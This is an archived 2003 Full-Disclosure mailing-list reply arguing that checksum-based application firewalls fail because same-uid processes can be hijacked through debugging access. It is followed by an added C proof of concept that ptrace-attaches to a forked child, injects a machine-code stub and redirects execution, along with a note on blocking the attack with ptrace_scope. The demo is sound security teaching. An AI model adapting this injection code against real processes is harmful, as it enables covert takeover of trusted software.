RE: [Full-Disclosure] Application level firewall

From: Adam Lydick (adam.lydick_at_verizon.net)
Date: 10/19/03

    To: Andriy Bilous <Andriy.Bilous@sabre-merlin.de>
    Date: Sun, 19 Oct 2003 07:56:54 -0700
    
    

    I don't understand why anyone would bother checking application
    checksums for access control. In fact, I'm not sure why anyone would
    bother running an "application firewall" at all. Ponder this: as long as
    debug privs aren't blocked between processes with the same uid by the
    application "firewall", you can just attach to an approved process and
    hijack its flow of control (that should be true of both Linux and
    Win32).

    I believe it is a bad idea to rely on such tools to protect your system.
    They are easy to work around (and this fact is documented, see my
    comment above and the list archives). I think a better solution (as a
    start) is to use software from authors that you trust. Even better
    (more technical) solutions are the various forms of sandboxing -- either
    userland with managed code or in kernelspace with tools such as
    systrace.

    Trying to audit natively executing code on the fly sounds like a battle
    you are going to lose. Maybe a clever developer could do something like
    valgrind and jit x86-x86 and intercept syscalls (this could allow for a
    somewhat slow systrace implementation in userland).

    (Take with a grain of salt, I haven't tested any software such as ZA and
    its brethren lately, so they might be doing some more magic that plugs
    those holes -- but it seems likely that they cannot fix all of them
    without patching a great deal of the OS)

    Just my standard complaints. Cheers.

    -- 
    Adam Ly***
    On Sat, 2003-10-18 at 08:19, Andriy Bilous wrote:
    > Some personal firewalls on windows are using checksums for every application
    > trying to access network device. Yesterday I've upgraded mirc and have got a
    > warning about this. iptables, unfortunately, doesn't provide such a
    > functionality out of the box. Luckily, it has an open API and extends well
    > over the kernel modules facility. What you speak about has a different name
    > - "content filtering"
    > 
    > Andriy Bilous 
    <trim>
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
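The attach-and-hijack that the mail describes, written out as an added example (this is not code from the original post, nor from any product named in the thread): a parent forks an "approved" victim process, attaches to it with ptrace, which the kernel permits because both run under the same uid, copies a 12-byte `_exit(42)` stub into the victim's current code page and points its program counter at the stub. The victim's binary on disk never changes, so a checksum-based whitelist still approves it, yet the code it now runs is the attacker's. Assumptions: Linux on x86_64 or aarch64; the function names, the exit status 42 and the machine-code bytes are the example's own. A return value of -1 means the kernel refused the attach (for instance Yama's `kernel.yama.ptrace_scope` set to 2 or higher, or a seccomp policy denying ptrace), which is exactly the "debug privs blocked" condition the mail says an application firewall would need.

```c
#define _GNU_SOURCE
#include <elf.h>
#include <errno.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>

#define MARKER 42   /* exit status the injected stub makes the victim return (example's choice) */

/* Constructed payload: _exit(MARKER) as raw machine code, 12 bytes on both targets. */
#if defined(__x86_64__)
/* mov edi, 42 ; mov eax, 60 (SYS_exit) ; syscall */
static const uint8_t stub[] = {0xbf,0x2a,0x00,0x00,0x00, 0xb8,0x3c,0x00,0x00,0x00, 0x0f,0x05};
#elif defined(__aarch64__)
/* mov x0, #42 ; mov x8, #93 (SYS_exit) ; svc #0 */
static const uint8_t stub[] = {0x40,0x05,0x80,0xd2, 0xa8,0x0b,0x80,0xd2, 0x01,0x00,0x00,0xd4};
#else
#error "this example covers Linux on x86_64 and aarch64 only"
#endif

/* Architecture-specific register access: read the victim's program counter, or
 * redirect it. Both variants also clear the syscall-result register so the kernel
 * applies no syscall-restart fixup (on x86_64 that fixup would rewind rip by 2). */
#if defined(__x86_64__)
static int get_pc(pid_t pid, uintptr_t *pc) {
    struct user_regs_struct r;
    if (ptrace(PTRACE_GETREGS, pid, NULL, &r) == -1) return -1;
    *pc = (uintptr_t)r.rip;
    return 0;
}
static int set_pc(pid_t pid, uintptr_t pc) {
    struct user_regs_struct r;
    if (ptrace(PTRACE_GETREGS, pid, NULL, &r) == -1) return -1;
    r.rip = pc;
    r.rax = 0;
    r.orig_rax = (unsigned long long)-1;   /* "not inside a syscall" */
    return ptrace(PTRACE_SETREGS, pid, NULL, &r) == -1 ? -1 : 0;
}
#else
static int get_pc(pid_t pid, uintptr_t *pc) {
    struct user_regs_struct r;
    struct iovec iov = { &r, sizeof r };
    if (ptrace(PTRACE_GETREGSET, pid, (void *)(uintptr_t)NT_PRSTATUS, &iov) == -1) return -1;
    *pc = (uintptr_t)r.pc;
    return 0;
}
static int set_pc(pid_t pid, uintptr_t pc) {
    struct user_regs_struct r;
    struct iovec iov = { &r, sizeof r };
    if (ptrace(PTRACE_GETREGSET, pid, (void *)(uintptr_t)NT_PRSTATUS, &iov) == -1) return -1;
    r.pc = pc;
    r.regs[0] = 0;                         /* no -ERESTART* value left in x0 */
    return ptrace(PTRACE_SETREGSET, pid, (void *)(uintptr_t)NT_PRSTATUS, &iov) == -1 ? -1 : 0;
}
#endif

/* Write `len` bytes into the tracee. PTRACE_POKETEXT ignores the page's read-only
 * protection (the kernel does copy-on-write), so the victim's text is patched in place. */
static int poke_bytes(pid_t pid, uintptr_t addr, const uint8_t *src, size_t len) {
    for (size_t off = 0; off < len; off += sizeof(long)) {
        long word;
        errno = 0;
        word = ptrace(PTRACE_PEEKTEXT, pid, (void *)(addr + off), NULL);
        if (word == -1 && errno != 0) return -1;
        size_t n = (len - off < sizeof(long)) ? len - off : sizeof(long);
        memcpy(&word, src + off, n);       /* keep any bytes past the payload as they were */
        if (ptrace(PTRACE_POKETEXT, pid, (void *)(addr + off), (void *)word) == -1) return -1;
    }
    return 0;
}

/* Forks an "approved" victim, attaches (same uid, so the kernel allows it unless
 * ptrace is restricted), overwrites the start of the victim's current code page with
 * the stub and resumes it there. Returns the victim's exit status (MARKER on success),
 * -1 if the attach was refused, -2 on any other failure. */
int hijack_demo(void) {
    int status = 0;
    uintptr_t pc, target;
    pid_t pid = fork();
    if (pid < 0) return -2;
    if (pid == 0) {
        volatile int spin = 1;             /* the victim: whitelisted, busy in user mode */
        while (spin) { }
        _exit(0);
    }
    if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) == -1) {
        kill(pid, SIGKILL);
        waitpid(pid, &status, 0);
        return -1;
    }
    if (waitpid(pid, &status, 0) != pid || !WIFSTOPPED(status)) goto fail;
    if (get_pc(pid, &pc) == -1) goto fail;
    target = pc & ~(uintptr_t)0xfff;       /* start of the page pc lives in: mapped and executable */
    if (poke_bytes(pid, target, stub, sizeof stub) == -1) goto fail;
    if (set_pc(pid, target) == -1) goto fail;
    if (ptrace(PTRACE_CONT, pid, NULL, NULL) == -1) goto fail;  /* data 0: swallow the SIGSTOP */
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status)) goto fail;
    return WEXITSTATUS(status);
fail:
    kill(pid, SIGKILL);
    waitpid(pid, &status, 0);
    return -2;
}

/* 1 if the run ended one of the two ways the mail predicts: hijacked, or attach blocked. */
int outcome_expected(int rc) { return rc == MARKER || rc == -1; }

int main(void) {
    int rc = hijack_demo();
    if (rc == MARKER) puts("victim exited with the injected status: checksum whitelist bypassed");
    else if (rc == -1) puts("ptrace attach refused: debug access is blocked, hijack fails");
    else printf("unexpected result %d\n", rc);
    return 0;
}
```

Build with `cc -o hijack hijack.c` and run it as an ordinary user. On a default desktop Linux (ptrace_scope 0 or 1) the victim exits with status 42 even though nothing about its executable changed, which is the whole objection to checksum-based approval. Setting `kernel.yama.ptrace_scope=2` (or 3) turns the attach into EPERM and the same binary prints the refusal, which is the control an application firewall would have to enforce itself to make per-application checksums mean anything.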
    
